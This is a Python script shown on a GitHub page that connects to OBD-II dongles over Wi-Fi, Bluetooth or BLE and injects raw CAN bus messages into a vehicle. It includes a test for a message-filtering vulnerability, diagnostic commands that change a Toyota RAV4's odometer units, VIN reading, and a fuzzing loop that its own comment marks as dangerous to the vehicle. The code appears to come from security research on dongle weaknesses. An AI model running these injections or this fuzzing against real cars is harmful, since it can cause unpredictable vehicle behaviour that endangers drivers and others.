-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathmain.py
215 lines (175 loc) · 6.71 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
import time
from settings import *
from bluetooth import *
import pyble
from OBDPeripheral import MyPeripheral
# query dongle configuration with dongle index
dongle = 1
dongle_config = get_config(dongle)
# Parameters:
# mode: 0-Wi-Fi, 1-Bluetooth, 2-BLE
# client_socket: connection instance (peripheral in BLE)
# message: data to be sent
# interval: waiting time limit between write and read operations
def inject_message(mode, client_socket, message, interval=0.5):
if mode == 0:
# Wi-Fi
client_socket.send(b"%s\r" % message)
time.sleep(interval)
data = client_socket.recv(1024)
print('Received: ', repr(data))
elif mode == 1:
# Bluetooth
client_socket.send(b"%s\r" % message)
time.sleep(interval)
data = client_socket.recv(1024)
print('Received: ', repr(data))
else:
# BLE
BLE_write_with_response(client_socket, message, interval) # client_socket is a peripheral instance
# Write value to a BLE peripheral and read response
def BLE_write_with_response(peripheral, value, interval):
v = bytearray(b"%s\r" % value)
peripheral.writeValueForCharacteristic(v, c_write.instance, True)
time.sleep(interval)
peripheral.readValueForCharacteristic(c_read.instance)
# Interactive shell for CAN message testing
def test_input(mode, client_socket):
while True:
_input = raw_input("Sending input:")
if _input.__len__() == 0:
return
inject_message(mode, client_socket, _input)
# Dongle initialization
def dongle_init(mode, client_socket):
# cmd_set = ['ATE0', 'ATRV', 'ATE1', 'ATH1', 'AT SP 6', 'AT CAF1']
cmd_set = ["ATZ", "ATH1", "AT SP 6"]
for cmd in cmd_set:
inject_message(mode, client_socket, cmd)
# time.sleep(1)
print "Dongle init finish"
print
# Test for message filtering vulnerability
def filter_test(mode, client_socket):
cmd_set = ["ATZ", "ATH1", "AT SP 6", "AT SH 191", "04 00 00", "02 00 00", "00 00 00", "01 00 00", "03 00 00", "05 00 00", "07 00 00", "08 00 00", "09 01 00", "10 00 01"]
for cmd in cmd_set:
inject_message(mode, client_socket, cmd)
# time.sleep(1)
print "Filter test finish"
print
# Converting odometer unit to KM/L, for Toyota RAV4
def To_KM_L(mode, client_socket):
cmd_set = ['ATCRA 7C8', 'ATFCSH 7C0', '3E1', 'ATE0', '3BA280']
for cmd in cmd_set:
inject_message(mode, client_socket, cmd)
print "To KM_L finish"
print
# Converting odometer unit to MPG, for Toyota RAV4
def To_MPG(mode, client_socket):
cmd_set = ['ATE0', 'ATRV', 'ATCRA 7C8', 'ATFCSH 7C0', '3E1', 'ATE0', '3BA240']
for cmd in cmd_set:
inject_message(mode, client_socket, cmd)
print "To KM_L finish"
print
# Read VIN with PID
def read_VIN(mode, client_socket):
cmd_set = ["ATD", "ATE0", "AT AT 0", "ATS0", "ATH0", "ATCAF 1", "AT ST 96", "AT SP 7", "09 02"]
for cmd in cmd_set:
inject_message(mode, client_socket, cmd)
print "Read VIN finish"
print
# Fuzzing test
# !!! Dangerous, since this will cause unpredicted consequence to the vehicle
def fuzz(mode, client_socket):
header_cmd = "AT SH 191"
inject_message(mode, client_socket, header_cmd)
# set message id finish
# start fuzzing
fuzz_cmd = "04 00 00" # fuzzing message
fuzz_speed = 0.02 # fuzzing speed in seconds
for i in range(1000):
inject_message(mode, client_socket, fuzz_cmd, 0)
time.sleep(fuzz_speed)
# Main
if dongle_config.mode == 0:
# Wi-Fi
HOST = dongle_config.address # Standard loopback interface address (localhost)
PORT = dongle_config.port # Port to listen on (non-privileged ports are > 1023)
print "Connection: ip=%s, port=%d" % (HOST, PORT)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# TODO WIFI, perform CAN bus message injection
dongle_init(0, s)
# To_MPG(0, s)
# read_VIN(0, s)
# filter_test(0, s)
elif dongle_config.mode == 1:
# Classic Bluetooth
print "Scanning nearby devices..."
devices = discover_devices(lookup_names=True)
for addr, name in devices:
print "%s - %s" % (addr, name)
if name.strip() == dongle_config.name:
dongle_config.address = addr
if dongle_config.address != "":
client_socket = BluetoothSocket(RFCOMM)
service_matches = find_service(address=addr)
print service_matches
client_socket.connect((dongle_config.address, dongle_config.port))
# TODO Bluetooth, perform CAN bus message injection
dongle_init(1, client_socket)
# test_input(1, client_socket)
# read_VIN(1, client_socket)
# filter_test(1, client_socket)
client_socket.close()
else:
print "[!] Device name %s not found!" % dongle_config.name
else:
# Bluetooth LE
cm = pyble.CentralManager()
if cm.ready:
target = None
device_list = []
p = None
scan_interval = 50 # number of scans
for i in range(scan_interval):
try:
target = cm.startScan()
if target:
if target not in device_list:
device_list.append(target)
if str(target).__contains__(dongle_config.name):
print "Target dongle %s found, connecting to it..." % dongle_config.name
p = cm.connectPeripheral(target)
break
except Exception as e:
print e
if p is None:
for d in device_list:
print d
print "Target Dongle %s not found." % dongle_config.name
else:
target.delegate = MyPeripheral
for service in p:
print service
for characteristic in service:
print characteristic, " : ",
print characteristic.value
# get corresponding read/write uuids
if dongle_config.uuid != "":
service_uuid = dongle_config.uuid.keys()[0]
read_uuid = dongle_config.uuid.get(service_uuid)[0]
write_uuid = dongle_config.uuid.get(service_uuid)[1]
c_write = p[service_uuid][write_uuid]
c_read = p[service_uuid][read_uuid]
else:
c_write = ""
c_read = ""
p.setNotifyForCharacteristic(True, c_read.instance)
# TODO BLE, perform CAN bus message injection
dongle_init(2, p)
# test_input(2, p)
# read_VIN(2, p)
# fuzz(2, p)
# filter_test(2, p)
cm.disconnectPeripheral(p)